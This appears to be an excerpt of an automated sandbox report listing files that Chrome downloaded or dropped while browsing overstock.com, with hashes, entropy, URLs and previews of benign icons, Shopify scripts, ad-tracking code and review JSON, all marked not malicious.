                                                                                                                                                                                    Preview:<svg width="96" height="96" viewBox="0 0 96 96" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_5474_553)">.<path d="M0 8C0 3.58172 3.58172 0 8 0H88C92.4183 0 96 3.58172 96 8V88C96 92.4183 92.4183 96 88 96H8C3.58172 96 0 92.4183 0 88V8Z" fill="#1A4E8A"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M61.4654 46.1011C62.7824 46.6194 64.0246 47.2467 65.1919 47.9794C67.2538 49.2942 68.9071 50.9582 70.152 53.0124C71.3969 55.0667 72 57.5318 72 60.4078C72 64.1466 71.1441 67.146 69.4324 69.4468C67.7206 71.7476 65.2697 73.4116 62.0796 74.4387C58.8895 75.4864 55.0769 76 50.6419 76H28V20H49.2803C53.0734 20 56.4385 20.5342 59.3952 21.6024C62.3519 22.6706 64.6861 24.2525 66.3979 26.3684C68.1096 28.4843 68.9655 31.1343 68.9655 34.3185C68.9655 37.5026 68.1096 39.9677 66.3979 42.1247C65.1074 43.7508 63.4633 45.0733 61.4654 46.1011ZM42.725 52.6633V64.2084H48.8524C50.3112 64.2084 51.6339 64.044 52.8205 63.7359C54.0071 63.4072 54.9602 62.8115 55.6605 61.9282C56.3608 61.0448 5
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (5864)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):630828
                                                                                                                                                                                    Entropy (8bit):4.3670817970855405
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:klkNKGpYHs0BMHxl679L1EM5oFaCWdf8invU6I/EQn:klk07379L1T5oFeU6I/L
                                                                                                                                                                                    MD5:44920488C360E599ACE572187816D2CB
                                                                                                                                                                                    SHA1:56926B9A9058E84065CCFE2EA727F16AFB1292FE
                                                                                                                                                                                    SHA-256:90AE4683258FA87565A0D44000C3877A15B9F3118C300EB7307F6B06AACC9E83
                                                                                                                                                                                    SHA-512:3EC6B22B1F6047932055F02D22062B37C01031BADC2E9BB7C1FB37D4AEE2E500D5BA24773C544E91ECF695C9CA1E94DEACBE179FEF8C88A5ECFD3E2336200AFB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:..let DEFAULT_addToCartBtnSelectorsApp7Ext = 'input[name="add"], button[name="add"], form[action*="/cart/add"] .gfg__add-to-cart,form[action*="/cart/add"] button[type="submit"], form[action*="/cart/add"] input[type="submit"], .product-form__buttons, .productView-group, .prd-Benefits, .product__submit__buttons, .t4s-product-form__buttons, .product-form__buy-buttons, .product__description, .v-stack.gap-4, .quantity-selector, .groups-btn';.let DEFAULT_checkoutBtnSelectorsApp7Ext = 'button[name="checkout"], input[name="checkout"], form[action*="/cart"] a[href="/checkout"], a[href="/checkout"], form[action="/cart"] input[type="submit"][name="checkout"], form[action="/cart"] button[type="submit"][name="checkout"], .previewCartInfo, .cart__ctas, .cart__items, .buy-buttons--compact, .drawer__footer, .ajax-cart__buttons, .taxes-discounts, .button-container, cart-drawer .line-item__content-wrapper, .mini-cart__actions, .cart__checkout-wrapper, .cart__footer-message, .js-contents, .cart--footer';
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (1286)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2742
                                                                                                                                                                                    Entropy (8bit):5.542101814250181
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:avElZXHwBuQg6uySfLLTlSVt84vUGqUBWvhD0Hp7/ZaTaVDDeNUi1GwGzD7JfByd:auXHauzf/hpnwBWZDYv2711GzD79S
                                                                                                                                                                                    MD5:8F04337EBB623C8B79A84DACB6A8D416
                                                                                                                                                                                    SHA1:93DE64BD21A0031FED2DD58CBE4D2A0566F4CD4E
                                                                                                                                                                                    SHA-256:2ADAE4F5588E7FD7F9AE1BFBFD2A1664F3BF8778D7A056CF57567F6790FF719D
                                                                                                                                                                                    SHA-512:B3F381AE1C93FDBEEE40A57F294AE98A18AA485320EBF38B88E236B6CA41C0D7705281A189D3612BD168A7E33AA3043AB63FBB200D23D1BEAC52EBF015E917AD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://widget.us.criteo.com/dis/dis.aspx?p=111036&cb=70737702806&ref=https%3A%2F%2Fwww.overstock.com%2F&sc_r=1280x1024&sc_d=24
                                                                                                                                                                                    Preview:.<!DOCTYPE html>.<html lang="en"><head><title>Dising</title>.<script type="text/javascript">..rD = false;..function edcTimeout() {.rD = true; }..function cto_AI(u,n) { if (rD) {return;} var cto_ifr=document.getElementById('cto_sub_ifr_px');var cto_ifr_doc=null;if(typeof(cto_ifr)==='undefined'||cto_ifr==null)cto_ifr_doc=document;else if(cto_ifr.contentDocument)cto_ifr_doc=cto_ifr.contentDocument;else if(cto_ifr.contentWindow)cto_ifr_doc=cto_ifr.contentWindow.document;else if(cto_ifr.document)cto_ifr_doc=cto_ifr.document;else cto_ifr_doc=document;if(cto_ifr_doc.createElement){var im=cto_ifr_doc.createElement('IMG');if(im){var d=document.getElementById('cto_pc');if(d!==null && d.appendChild){d.appendChild(im)}if(n){im.onload=n;im.onerror=n;im.onabort=n}im.src=u}} }..function cto_l(){if(typeof(cto_loaded)==='undefined')cto_loaded=1;else cto_loaded++;}..function cto_run() {function l_i1_1(){cto_AI('https://ad.tpmn.co.kr/pixelCt.tpmn?tpmn_nid=26a681017b4fdc02f3aef3aa921ede3e&tpmn_buid=k-G
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):10366
                                                                                                                                                                                    Entropy (8bit):4.12348621500406
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:6BO82dk2ofUAvjA4K95Imbpex7PAzwJAtRTG0VB:6BO9urzunbENVJAtpG0/
                                                                                                                                                                                    MD5:0D925E9FD9B4FBDD8EB02D44A16C39C1
                                                                                                                                                                                    SHA1:314AC62D54011329DFC99A483E533DEB164A95CC
                                                                                                                                                                                    SHA-256:F24A918B57210227ECD51408BC89E4483CEFB7A7D2C8DDB223BB71DD0E7402DA
                                                                                                                                                                                    SHA-512:0183ABE41E7E32D6569C8F59FBD8B234470B21B7FC41D7B86F98B6296579997A7B7DA675B6C762B917CBF4B8AAAC379E0AC7533F42992BBCADCD72BFCA12EA8E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="571" height="212" viewBox="0 0 571 212" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_558_6657)">.<rect x="176" y="-12" width="136" height="136" rx="68" fill="#832E00"/>.<path d="M226.874 28.636H230.026V37.5H226.874V36.092C226.122 37.196 224.81 37.82 223.226 37.82C220.65 37.82 219.258 36.172 219.258 33.852V28.636H222.41V33.644C222.41 34.796 223.066 35.468 224.266 35.468C225.322 35.468 226.202 34.972 226.874 33.884V28.636ZM239.061 37.82C237.445 37.82 236.197 37.196 235.413 36.188V40.7H232.261V28.636H235.413V29.932C236.197 28.94 237.445 28.3 239.061 28.3C241.845 28.3 243.765 30.124 243.765 33.068C243.765 35.996 241.845 37.82 239.061 37.82ZM238.181 30.716C237.109 30.716 236.133 31.084 235.429 31.98V34.14C236.133 35.036 237.109 35.404 238.181 35.404C239.845 35.404 240.773 34.54 240.773 33.068C240.773 31.58 239.845 30.716 238.181 30.716ZM256.188 34.908L256.716 36.972C255.916 37.516 254.668 37.836 253.596 37.836C251.58 37.836 250.06 36.732 250.06 34.588
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (423)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):483
                                                                                                                                                                                    Entropy (8bit):5.251557737815367
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:4ixYvgKOO0g1SaC0CQOxJ9GqTGq/WxNibYn:QgTO0gMa0/IxNu2
                                                                                                                                                                                    MD5:918F3CA651A55EA0C93D9F7507C151CF
                                                                                                                                                                                    SHA1:9DBB4E7CCDE4F005D2A90920C5B996CEEE1E91A6
                                                                                                                                                                                    SHA-256:C01A2D3C1DDEDA8302776E6F15725041CEAC674E05CEEA1D40E95CD59DFF870C
                                                                                                                                                                                    SHA-512:4537CF382A3EA8A6DB4256026224A57106EFC00FD1ACEACFD5400A2FADAA176C8E633F66908A2FC36E636E7A3DB50DD11BD0C339841E8E5EA62357BB1A934385
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:export const handleize=inputString=>inputString.toLowerCase().replace(/[^a-z0-9]+/g,"-").replace(/(^-|-$)+/g,""),formatMoney=({amount,currencyCode="USD"},cents=!1)=>{let amt=amount;return Number.isNaN(amt)?console.error("utils/format-money.js: No amount value passed."):(cents&&(amt/=100),new Intl.NumberFormat("en-US",{style:"currency",currency:currencyCode,minimumFractionDigits:2,maximumFractionDigits:2}).format(amt))};.//# sourceMappingURL=/cdn/shop/t/224/assets/helpers.js.map.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):116513
                                                                                                                                                                                    Entropy (8bit):5.34426438977711
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:eJuyfE/+IV8rKrXLlciGW+G2VTKAdRlAmKMaV9nrl80/SvKcAxAMQLxC1QLWHuC6:+DsxX+G2VTKAVtvKjWMp1iWu
                                                                                                                                                                                    MD5:F74D2C1D7F7B2041E00F0347C7D2D5F8
                                                                                                                                                                                    SHA1:ABE7F23DFC882240C6641B061A84AFF68FDEAB5D
                                                                                                                                                                                    SHA-256:A3C053D11506F3F1EF0795F89739C8A0F99E4E2D50FC05205B4EC0A818A32C57
                                                                                                                                                                                    SHA-512:EB4D8E401D7EEA9F625A04D3B1DEFD7856A5EC31ECE9B67A806924EFB34D4B3FE879C0900905F16012A2903E2533A0D9BD4B153C87918623ABF219B9C66D7E00
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(){var e={1644:function(e,t){"use strict";function n(e,t,n){try{var i;r({error:e,context:t,shopId:o()||(null===(i=window.Shopify)||void 0===i?void 0:i.shop),notes:n})}catch(e){}}function o(){try{const e=document.getElementById("shopify-features").textContent;return JSON.parse(e).shopId}catch(e){return null}}function r(e){const t=new XMLHttpRequest;t.open("POST","https://notify.bugsnag.com/",!0),t.setRequestHeader("Content-Type","application/json"),t.setRequestHeader("Bugsnag-Api-Key","95ba910bcec4542ef2a0b64cd7ca666c"),t.setRequestHeader("Bugsnag-Payload-Version","5");const n=function(e){const t=(n=e.error).stackTrace||n.stack||n.description||n.name;var n;const[o,r]=(t||"unknown error").split("\n")[0].split(":");return JSON.stringify({payloadVersion:5,notifier:{name:"ConsentTrackingAPI",version:"latest",url:"-"},events:[{exceptions:[{errorClass:(o||"").trim(),message:(r||"").trim(),stacktrace:[{file:"consent-tracking-api.js",lineNumber:"1",method:t}],type:"browserjs"}],context
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):283864
                                                                                                                                                                                    Entropy (8bit):5.558253402207482
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:YfwiztGbET0atoNy025CptDY8/I8+yr/OUYhcDm6DcM8Gp/0LG:WGbgTtoKM/GUT9cM8Gp/0K
                                                                                                                                                                                    MD5:5CA1CEE08B61C2572A638B95EBA54424
                                                                                                                                                                                    SHA1:B87461EDFB083140A804B710F3DD87A4BDA823D3
                                                                                                                                                                                    SHA-256:4E90EC1A2C83BAA549AE399E0A1729821A956F7231B65D1519AFBFB862E5C00F
                                                                                                                                                                                    SHA-512:CC28D81957A9144CE6A08239FE5CC2485BC9B45ADC05CB34C6E01100844441DFD90F111536B6659E6BE607232CDA8ABC6715785DFF0659C42BA0F702D2D55E80
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":15,"vtp_instanceDestinationId":"AW-16653831969","tag_id":9},{"function":"__ogt_1p_data_v2","priority":5,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_reg
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (48897)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1672817
                                                                                                                                                                                    Entropy (8bit):5.475916048157043
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:49152:KRS3E0mVgrwaePOfov3p1yaDPXhLqDSa3ou58RsetRs4Obnmyc1wHdcVllfZzutb:KJDPz0
                                                                                                                                                                                    MD5:71DACA80240EA89B5C4A7CC782839E8D
                                                                                                                                                                                    SHA1:55BCE7C559EB7A388ABF84D148B1A3B78227BE25
                                                                                                                                                                                    SHA-256:07C38C0C03EBEF05E359764886B3629BEF1073F114F0F359BE751C987EEC1F7F
                                                                                                                                                                                    SHA-512:FCC0626EDF47380E4628A5628D7680A3F01D7E3045C7696C84A44A1DFB7335EDDEF55AE695EDA0D4705B4BDA65B11187BA7C8953C700D512C7D413A80F1AC71F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/app.DfgMZONA.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["Assistant.BcSSlj7O.js","assets/Assistant.PVhJuO-T.css","component-PhoneNumberFormatter.BKmbVPc7.js","getCountryCallingCode.CIAGUJN6.js","index.CYmXWMTL.js","actions.D__Kux7b.js","graphql-utilities.BTIPFCNt.js","CheckoutEditorBridge.CamOCnXl.js","LegacyVaultedShippingMethods.CLlWtWZU.js","Rollup.B0QeYKuB.js","assets/Rollup.o9Mx-fKL.css","SubscriptionPriceBreakdown.CxrCP-xw.js","assets/SubscriptionPriceBreakdown.Bqs0s4oM.css","component-ProfilePreviewBar.CnWnydkS.js","assets/ProfilePreviewBar.CqJK7U9e.css","ActiveInspector.DQLiU2o-.js","assets/ActiveInspector.DvJo1XKD.css","component-AutocompleteField.B_dNnvGT.js","hooks.CJ9fMJ3B.js","assets/AutocompleteField.x0LibsMb.css","component-ShippingGroupsSummary.2Gt3Vygr.js","StackedMerchandisePreview.JyjIicj-.js","assets/StackedMerchandisePreview._xnAOXmq.css","useAmazonContact.ysZ2sjoF.js","assets/useAmazonContact.D-Ox6Dnf.css","component-Throttle.Blurq3vs.js","assets/Throttle.BA0bvilx
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1610x894, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):24134
                                                                                                                                                                                    Entropy (8bit):7.980690486333601
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:5xad/diICJmiD/hTUR/1MbP54S1q6Rk/RB4UZCe1RZuQvPzB5nUT9Ghml:5EdVzM/adMbP5h1q6u3ZCGvzBVg9OY
                                                                                                                                                                                    MD5:395C4496E0B3F73DD762F162F84D64CC
                                                                                                                                                                                    SHA1:9D65AD47B160961E18F10DB745F6C0DB4A5B125D
                                                                                                                                                                                    SHA-256:B486BC8BF8DC0D3F9B7C28AE8A6FC65B447DAE42EA3BDDCA0D089780BA4A67ED
                                                                                                                                                                                    SHA-512:9CC0FE9B345D47C7CABD23C46193588036C8FD30B46BBAE6097B5F918290F5A1460EAB84E49B511E4AD4328FD7295EA7A621AB328DFC84ECA0F48DB003AFBC8B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/805x447_Evergreen_Desktop_A1.jpg
                                                                                                                                                                                    Preview:RIFF>^..WEBPVP8 2^...[...*J.~.>.v.T.....r.#...gn..a.*.&..d.x.~.\.>......O-....o.s..e...<.;....M..=....../.....>.]$<...zm...3.......G.._G./a=...'......xk....Y.hf..c.].G..K(g.#...E..:....O.....A8~./...m....l.~.1?.T[0uF|..(.T[/).......AQl...j....j*.(....TY...?.pld.._rQ..S.H..C?a...*-.......b. ..A.H........F...........*8p........].l.~.1?.T[/)............E..ce.6v....w:......M..Ca.~.1?.T[/).......AQl.oO.0[.d...B.u.:..E.....a."@.v.......b. ..^SgT3.....\...S.`+6.ki.j..#&.yM.P.U....b0.yM.P..F'...e.6uC?a..?<....2.R%..b-......~.....#.s......AQl...g.#....:p.q.O..8$.......1.6QG.H...C}m.......V..m.:..g.16..E.E...M.P..F'...e.6uC?a...i...m.......S.}=P.>.....lQ..(.C...E..:....O.....l...=T8Lue...@..b..."...V.t...s3....yM.P..F'...e.6uC?Wb..[.c'~.l.....v.A;=..&.......O..E..:....O.....l...<....J.v.8@....J;>.^....*A.M~.B.....AQl...g.#...E9..QX...g.C.. ......(..=^.q...YiF.....a......O.D.".....w...K.......'&{....3.......yM.P..F'...d.p..T...`.....@P.~...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1025
                                                                                                                                                                                    Entropy (8bit):4.426331260574637
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:tYU/duXMMDg50TVkG7dbcniIq6aOTNUhfLrRdk2:n/gIokGZbPz6hTNUhfLrZ
                                                                                                                                                                                    MD5:9E457B7B5C8D299B8CF3E0308E0F705A
                                                                                                                                                                                    SHA1:18E0127E7CB323492C66F5C50C94AB0793588A11
                                                                                                                                                                                    SHA-256:40DA66365AB40CDDBE064DB3F4A46F850240489D49CB859EE7387A86A4B2EEB5
                                                                                                                                                                                    SHA-512:63083E31F697C563565043AB65BBD720F07CE1C0382F18F747685534E947BE6767A8D7235FCC0D9BB88548F37208FF5924C771EFF213CA62B0886F0EAA8E5939
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/icon-tag.svg
                                                                                                                                                                                    Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M9.501 3.942C9.21599 3.68616 8.78401 3.68616 8.499 3.942L3.499 8.43032C3.34053 8.57258 3.25 8.77549 3.25 8.98844V19.5001C3.25 19.699 3.32902 19.8898 3.46967 20.0305C3.61032 20.1711 3.80109 20.2501 4 20.2501H9H9.5H19C19.4142 20.2501 19.75 19.9143 19.75 19.5001V8.98844C19.75 8.77549 19.6595 8.57258 19.501 8.43032L14.501 3.942C14.216 3.68616 13.784 3.68616 13.499 3.942L11.5 5.73643L9.501 3.942ZM10.3773 6.74428L9 5.50797L4.75 9.32304L4.75 15.5001H8.25V8.98844C8.25 8.77549 8.34053 8.57258 8.499 8.43032L10.3773 6.74428ZM4.75 18.7501L4.75 17.0001H8.25V18.7501L4.75 18.7501ZM9.75 18.7501V17.0001L18.25 17.0001V18.7501H9.75ZM18.25 9.32305V15.5001L9.75 15.5001V9.32304L14 5.50797L18.25 9.32305ZM14 9.50012C14.5523 9.50012 15 9.05241 15 8.50012C15 7.94784 14.5523 7.50012 14 7.50012C13.4477 7.50012 13 7.94784 13 8.50012C13 9.05241 13.4477 9.50012 14 9.50012Z"
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2458
                                                                                                                                                                                    Entropy (8bit):7.107225981941327
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxjaFVHigZEj3nQ4iLx/Xby0NC2+r3:NBIl/XrxMVHigyX2x/btUNT
                                                                                                                                                                                    MD5:33D5D98D34F185783A3EB022846AB091
                                                                                                                                                                                    SHA1:9E2EE6BA317F273F882614250C480607F853356A
                                                                                                                                                                                    SHA-256:DB052E50FDC9DC34BA4A93DCC1BB37A9FC452C15533F1896B4CFF8CBA7594470
                                                                                                                                                                                    SHA-512:406E0AA7C89ED1890C745F2C41B30B142469D51571B33A3006C343AC6E8D6713E20A30F4AA518B3E6ED540B4BB7A39A4F1EA025B1B744AB6C6D7C1DB30F3DB06
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................et.#..#..+=..8l....h&A.2El.x..dK.....N..:...v..eK..W..SF..}y..]>m....% .5..I.....4.[7...a.[Q......`.2VH.x.Y_v...d......r..:xa. .!.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1180
                                                                                                                                                                                    Entropy (8bit):4.750246367122672
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfa5GLDWLNBExGVLKwxGVLNXQ4LrPyLduLGGWLmyLcmLV:YBVLyL7uGVLLGVLNXVLrKLALGpLNLTLV
                                                                                                                                                                                    MD5:CE57B832C8A771AE3781870F6463EE0E
                                                                                                                                                                                    SHA1:3F46D5988990110101CBF3234C6330EFF2570EE4
                                                                                                                                                                                    SHA-256:1EE98CE00111C8B8C04B57045952617EAE1B39E072D0FF39D54447828B4641E5
                                                                                                                                                                                    SHA-512:13979E0684587D797F4C3DDBB78A4B473ED6EB16C8BDF885FE19DCD59BD049E63EAC734972AF6D65B1B43BCB984D0D0FBA94DAC8AC9EF9601F49C64D85C96AE4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/9463624%2C38101309%2C20457171%2C35696626%2C31841558%2C31629369%2C39176653%2C28272004%2C37831689%2C13404429/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"35696626","rollup":{"average_rating":4.44,"rating_count":73,"review_count":73,"answered_questions":0}},{"page_id":"38101309","rollup":{"average_rating":4.55,"rating_count":11,"review_count":11,"answered_questions":0}},{"page_id":"37831689","rollup":{"average_rating":5.0,"rating_count":8,"review_count":8,"answered_questions":0}},{"page_id":"39176653","rollup":{"average_rating":4.63,"rating_count":8,"review_count":8,"answered_questions":0}},{"page_id":"9463624","rollup":{"average_rating":4.75,"rating_count":177,"review_count":177,"answered_questions":0}},{"page_id":"13404429","rollup":{"average_rating":4.28,"rating_count":161,"review_count":161,"answered_questions":0}},{"page_id":"20457171","rollup":{"average_rating":4.71,"rating_count":699,"review_count":699,"answered_questions":0}},{"page_id":"28272004","rollup":{"average_rating":4.82,"rating_count":11,"review_count":11,"answered_questions":0}},{"page_id":"31629369","rollup":{"average_rating":4.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (58819)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3093209
                                                                                                                                                                                    Entropy (8bit):5.366280693486657
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24576:C3a+ENoE0ehD2vByjVEJYJGrZ9RlyMkI2c+OC5yXJSMg4uz8ScBoRqw+YGK2L3KY:Cq+9sUBYLFr1+Vz
                                                                                                                                                                                    MD5:FCBD08B51CB49F693447DF9E4C1AFC55
                                                                                                                                                                                    SHA1:159FC6E3D58E7F9E857E279E0F827B69A767D0A2
                                                                                                                                                                                    SHA-256:7BCD1CCCEDCFD64B243EE7CA958121ADBE33F761D9B80F41751662D00A45ACA7
                                                                                                                                                                                    SHA-512:BB05CB3B4FDA3625EB54E33D80E761D615CC3991DF1189467D1EE9C63300FF8F1BFBB0DE8CF73773B2A22D0F4B935D10E8C0E189B6F52D54613F9BD0EC66C25B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/collections/more
                                                                                                                                                                                    Preview:<!doctype html>.<html class="no-js" lang="en" dir="ltr">.<head>. <script>. if (!window.DOMAINE) window.DOMAINE = {};. window.DOMAINE.technical = {. apiVersion: "2024-07",. storefrontToken: "72e5b536982e2714efe8f8314d50d8f3",. shopName: "a37a28-2.myshopify.com",. localization: {. countryCode: "US",. currencyCode: "USD". }. };.</script>.. <script>. const _url = new URL("https://www.overstock.com/collections/more").. if (_url.host === 'a37a28-2.myshopify.com' || _url.host === 'checkout.overstock.com') {. _url.host = 'www.overstock.com';. window.location = _url.toString();. }.. if (_url.pathname === '/account/login') {. const loginURL = new URL('?redirect_to=https%3A%2F%2Fwww.overstock.com%2F', 'https://login.overstock.com');. window.location = loginURL.toString();. }. . const query = new URLSearchParams(window.location.search).get('q')?.toLowerCase();. const path = window.location.pathname;.. if (path === '/searc
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (45593)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):208669
                                                                                                                                                                                    Entropy (8bit):5.434588350112003
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:D4KDveMUnt96samwiHcv87FjDJ7j1R4pCkOGrg:Fe7BamwiHcv87/j84kOGU
                                                                                                                                                                                    MD5:E4A59A6A4ACC60B3E36258E1D6CCAAC5
                                                                                                                                                                                    SHA1:774A04F47382E6E811F4A7EDA0492822FFBA964D
                                                                                                                                                                                    SHA-256:5DC9257237C5C519DB2B4F1BCED9B638FBEE12EE46163FC02CF6B77EFB793379
                                                                                                                                                                                    SHA-512:002B258870ADD9BB27185AAFC133249785CE22976645C5DBEDBC6AFD015FB950DA81C4672A508C76CBC9D92688E592421CD687227FA29382D1EC9D0FCF4621F0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/page-triggers.714.bundle.5dc9257237c5c519db2b4f1bced9b638fbee12ee46163fc02cf6b77efb793379.js
